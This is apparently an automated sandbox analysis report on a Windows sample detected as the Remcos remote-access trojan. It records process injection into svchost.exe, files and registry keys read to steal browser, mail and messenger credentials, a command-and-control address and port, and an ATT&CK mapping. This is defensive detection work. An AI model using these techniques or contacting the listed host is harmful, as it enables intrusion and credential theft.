Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_000841FD BlockInput,

0_2_000841FD

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00013B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00013B4C

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00045CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00045CCC

Source: C:\Windows\SysWOW64\svchost.exe

7_2_0040DD85

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0008C304 LoadLibraryA,GetProcAddress,

0_2_0008C304

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_01E735A0 mov eax, dword ptr fs:[00000030h]	0_2_01E735A0
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_01E73540 mov eax, dword ptr fs:[00000030h]	0_2_01E73540
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_01E71ED0 mov eax, dword ptr fs:[00000030h]	0_2_01E71ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_03B935A0 mov eax, dword ptr fs:[00000030h]	5_2_03B935A0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_03B93540 mov eax, dword ptr fs:[00000030h]	5_2_03B93540
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_03B91ED0 mov eax, dword ptr fs:[00000030h]	5_2_03B91ED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004432B5 mov eax, dword ptr fs:[00000030h]	6_2_004432B5

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_000681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_000681F7

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003A364 SetUnhandledExceptionFilter,	0_2_0003A364
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_0003A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0003A395
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CA364 SetUnhandledExceptionFilter,	5_2_000CA364
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_000CA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_000CA395
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_004349F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00434B47 SetUnhandledExceptionFilter,	6_2_00434B47
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0043BB22
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00434FDC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.175.229.139 8087			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

6_2_004180EF

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 89C008

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

6_2_004120F7

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00068C93 LogonUserW,

0_2_00068C93

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00013B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00013B4C

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00014A35

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00074EC9 mouse_event,

0_2_00074EC9

Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cnaniAxghZ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ncqkhweaghcgworcchyfyhlbjpqn"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qwvdipptuputyufolskgjmgkrwiwkdi"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\aybv"	Jump to behavior

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

0_2_000681F7

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00074C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00074C03

Source: cnaniAxghZ.exe, name.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: svchost.exe, 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagersInfo
Source: svchost.exe, 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: cnaniAxghZ.exe, name.exe	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\??\C:\Usersgp
Source: svchost.exe, 00000006.00000002.2877479755.0000000003077000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2877299346.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: svchost.exe, 00000006.00000002.2877299346.0000000003031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0003886B cpuid

0_2_0003886B

Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,	6_2_0040F8D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	6_2_00452036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_004520C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	6_2_00452313
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	6_2_00448404
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_0045243C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	6_2_00452543
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_00452610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	6_2_004488ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_00451CD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	6_2_00451F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	6_2_00451F9B

Source: C:\Windows\SysWOW64\svchost.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_000450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_000450D7

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00052230 GetUserNameW,

0_2_00052230

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_0004418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0004418A

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Code function: 0_2_00014AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00014AFE

Source: C:\Users\user\Desktop\cnaniAxghZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Contains functionality to steal Chrome passwords or cookies

Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2877207597.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR

Source: C:\Windows\SysWOW64\svchost.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

6_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\svchost.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		6_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \key3.db		6_2_0040BB30

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5428, type: MEMORYSTR

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8
Source: name.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\svchost.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO

Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.name.exe.3f20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2877207597.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8084, type: MEMORYSTR

Source: C:\Windows\SysWOW64\svchost.exe

Code function: cmd.exe

6_2_0040569A

Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00086596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00086596
Source: C:\Users\user\Desktop\cnaniAxghZ.exe	Code function: 0_2_00086A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00086A5A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00116596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	5_2_00116596
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 5_2_00116A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	5_2_00116A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	2 Native API	1 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	2 Valid Accounts	1 Bypass User Account Control	2 Obfuscated Files or Information	1 Credentials in Registry	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Windows Service	2 Valid Accounts	1 DLL Side-Loading	3 Credentials In Files	3 File and Directory Discovery	Distributed Component Object Model	221 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Bypass User Account Control	LSA Secrets	138 System Information Discovery	SSH	3 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	1 Masquerading	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	12 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	422 Process Injection	2 Valid Accounts	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	422 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
cnaniAxghZ.exe	79%	ReversingLabs	Win32.Backdoor.Remcos
cnaniAxghZ.exe	100%	Avira	TR/AutoIt.mqvhn
cnaniAxghZ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://www.nirsoft.net	0%	Avira URL Cloud	safe
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
07.175.229.139	0%	Avira URL Cloud	safe
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingaotak	0%	Avira URL Cloud	safe
http://www.imvu.comr	0%	Avira URL Cloud	safe
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc	0%	Avira URL Cloud	safe
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad	0%	Avira URL Cloud	safe
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742	0%	Avira URL Cloud	safe
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr	0%	Avira URL Cloud	safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	0%	Avira URL Cloud	safe
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8	0%	Avira URL Cloud	safe
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c	0%	Avira URL Cloud	safe
https://login.yahoo.com/config/login	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51	0%	Avira URL Cloud	safe
https://maps.windows.com/windows-app-web-link	0%	Avira URL Cloud	safe
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat	0%	Avira URL Cloud	safe
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d	0%	Avira URL Cloud	safe
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	Avira URL Cloud	safe
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68	0%	Avira URL Cloud	safe
http://www.nirsoft.net/	0%	Avira URL Cloud	safe
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2	0%	Avira URL Cloud	safe
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d	0%	Avira URL Cloud	safe
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437	0%	Avira URL Cloud	safe
http://www.imvu.com	0%	Avira URL Cloud	safe
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=wsb	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpSystem32	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingaot	0%	Avira URL Cloud	safe
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae	0%	Avira URL Cloud	safe
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03	0%	Avira URL Cloud	safe
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7	0%	Avira URL Cloud	safe
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingrms	0%	Avira URL Cloud	safe
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993	0%	Avira URL Cloud	safe
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3	0%	Avira URL Cloud	safe
https://www.google.com/accounts/servicelogin	0%	Avira URL Cloud	safe
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5	0%	Avira URL Cloud	safe
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135	0%	Avira URL Cloud	safe
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59	0%	Avira URL Cloud	safe
http://www.ebuddy.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
geoplugin.net	178.237.33.50	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
07.175.229.139	true	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.imvu.comr	svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	svchost.exe, 00000007.00000002.2868756077.00000000009B3000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingaotak	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
